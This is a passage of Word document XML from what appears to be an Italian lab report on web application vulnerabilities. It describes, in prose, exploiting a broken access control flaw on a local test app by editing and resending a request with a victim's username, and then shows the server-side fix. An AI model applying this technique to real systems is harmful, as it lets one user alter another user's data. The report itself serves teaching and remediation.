        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389B43AA" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3536DE7C" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4507F5F1" w14:textId="257AEC16" w:rsidR="00816871" w:rsidRPr="00ED7083" w:rsidRDefault="00816871" w:rsidP="00816871">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC041E" w14:textId="5634D8E8" w:rsidR="007424E1" w:rsidRDefault="00816871" w:rsidP="000F4F60">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Innanzitutto, bisogna essere autenticati con un utente valido. Successivamente ci si collega al seguente URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="007424E1" w:rsidRPr="00FC6739">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://localhost:8080/test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED7083">
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, si apre il web developer tool del browser nella sezione network per accedere alle richieste inviate sulla rete. Bisogna poi inserire un hobby normalmente come in Figura 11, in modo da andare a modificare la richiesta </w:t>
      </w:r>
      <w:r w:rsidR="0098788D">
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">facendo Edit and Resend e cambiando lo username con quello della vittima, come </w:t>
      </w:r>
      <w:r w:rsidR="000F4F60">
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">visibile in Figura 12. </w:t>
      </w:r>
      <w:r w:rsidR="0098788D">
        <w:t>In questo modo siamo riusciti a inserire l’hobby per l’utente “salvatore” ma essendo autenticati come “user”.</w:t>
      </w:r>
      <w:r w:rsidR="007424E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E55F0" w14:textId="732858A7" w:rsidR="00ED7083" w:rsidRDefault="00ED7083" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252EA9B6" w14:textId="5CECFA80" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251770880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A52F6BE" wp14:editId="525069A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-285750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4117340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6691630" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="959846599" name="Casella di testo 1"/>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0221C078" w14:textId="19DF4944" w:rsidR="0098788D" w:rsidRPr="00EF7AE7" w:rsidRDefault="0098788D" w:rsidP="0098788D">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Figura </w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="004E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>11</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Inserimento di un nuovo hob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F6BE" id="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-22.5pt;margin-top:324.2pt;width:526.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IGg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wsPs8WNxSSFFvcfI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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0221C078" w14:textId="19DF4944" w:rsidR="0098788D" w:rsidRPr="00EF7AE7" w:rsidRDefault="0098788D" w:rsidP="0098788D">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>11</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Inserimento di un nuovo hobby</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251768832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="007ECA89" wp14:editId="331FFEA4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6691917" cy="3914666"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4524829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1917" cy="3914666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861E134" w14:textId="36C06804" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5784454A" w14:textId="609AD704" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5862D218" w14:textId="54864BEE" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C630C31" w14:textId="08600553" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2377C3AB" w14:textId="5760FDF6" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B410BA7" w14:textId="42B0366D" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5AEA74" w14:textId="217723C0" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F116607" w14:textId="2EC1A171" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527790FC" w14:textId="24C04ECD" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B1ACFA" w14:textId="05407606" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2994D56E" w14:textId="6BDA6C7C" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C19154" w14:textId="684FCA1E" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C9B736" w14:textId="3CD576AE" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72192E6E" w14:textId="716BD057" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B37C455" w14:textId="77777777" w:rsidR="00ED7083" w:rsidRDefault="00ED7083" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFD9E13" w14:textId="77777777" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680EFC45" w14:textId="77777777" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFE85C3" w14:textId="77777777" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AA7855" w14:textId="67B77045" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BA3178" w14:textId="01260828" w:rsidR="0098788D" w:rsidRDefault="000F4F60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251773952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B138D59" wp14:editId="5E962939">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-532130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2628900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7183755" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1107395672" name="Casella di testo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77ECFC17" w14:textId="2F6DF3B0" w:rsidR="000F4F60" w:rsidRPr="00E769CD" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Figura </w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="004E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>12</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Aggiunta hobby per l'utente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8D59" id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-41.9pt;margin-top:207pt;width:565.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wm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Xk3uZ/ez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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="77ECFC17" w14:textId="2F6DF3B0" w:rsidR="000F4F60" w:rsidRPr="00E769CD" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>12</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Aggiunta hobby per l'utente vittima</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251771904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4875F7B8" wp14:editId="384A3DE7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>232410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7184270" cy="2339340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="490291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4270" cy="2339340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="629AEF90" w14:textId="5260BB2B" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349948F7" w14:textId="0FAFA13E" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12923813" w14:textId="4986238F" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108699B4" w14:textId="578B96E2" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C97297F" w14:textId="2DAB0F5D" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4010A54F" w14:textId="2A7C041A" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E640515" w14:textId="097C8462" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E382651" w14:textId="4946C117" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C81FD4" w14:textId="77777777" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7F1268" w14:textId="77777777" w:rsidR="0098788D" w:rsidRDefault="0098788D" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211E2148" w14:textId="08C98183" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="000F4F60"/>
    <w:p w14:paraId="09A40F71" w14:textId="77777777" w:rsidR="00ED7083" w:rsidRPr="00ED7083" w:rsidRDefault="00ED7083" w:rsidP="00ED7083">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB78F8" w14:textId="6F7E6E48" w:rsidR="007424E1" w:rsidRDefault="000F4F60" w:rsidP="00ED7083">
      <w:r>
        <w:t>Per risolvere la vulnerabilità bisogna c</w:t>
      </w:r>
      <w:r w:rsidR="00ED7083">
        <w:t>ontrollare che l’utente per cui si fanno le modifiche è lo stesso di quello autenticato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per fare ciò è stato modificata l’API /test in TestController.java inserendo tale controllo mostrata in Figura 13. Tali richieste verranno ora bloccate se si tenta di effettuarle per un altro utente, restituendo la risposta NOT_ACCEPTABLE. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7083">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE01CA4" w14:textId="50D6E668" w:rsidR="00ED7083" w:rsidRDefault="000F4F60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251776000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F520C74" wp14:editId="7B15E990">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>626110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1671320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4867275" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="209037704" name="Casella di testo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75833DB" w14:textId="1A54BD1C" w:rsidR="000F4F60" w:rsidRPr="00A61C0B" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Figura </w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="004E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>13</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Test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0C74" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:49.3pt;margin-top:131.6pt;width:383.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DY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O7uZ3lxzJik2+3wd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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="275833DB" w14:textId="1A54BD1C" w:rsidR="000F4F60" w:rsidRPr="00A61C0B" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>13</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: TestController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1483A1B4" wp14:editId="7E1A3AC8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4867352" cy="1488263"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="690855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352" cy="1488263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A038F8" w14:textId="3E5DE4A7" w:rsidR="005B284B" w:rsidRPr="00F04F57" w:rsidRDefault="005B284B" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC45E0F" w14:textId="4098EEBE" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB35B88" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C5ECC5" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6421A851" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781C9426" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B7BE14" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00C46E60"/>
    <w:p w14:paraId="6CEA8100" w14:textId="77777777" w:rsidR="006B3EEC" w:rsidRDefault="006B3EEC" w:rsidP="00C46E60"/>
    <w:p w14:paraId="70D14415" w14:textId="145D7EFB" w:rsidR="003A418E" w:rsidRPr="00ED7083" w:rsidRDefault="00553627" w:rsidP="00ED7083">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
      <w:r w:rsidR="001A56AB" w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37451B94" w14:textId="4D4812C5" w:rsidR="000F4F60" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
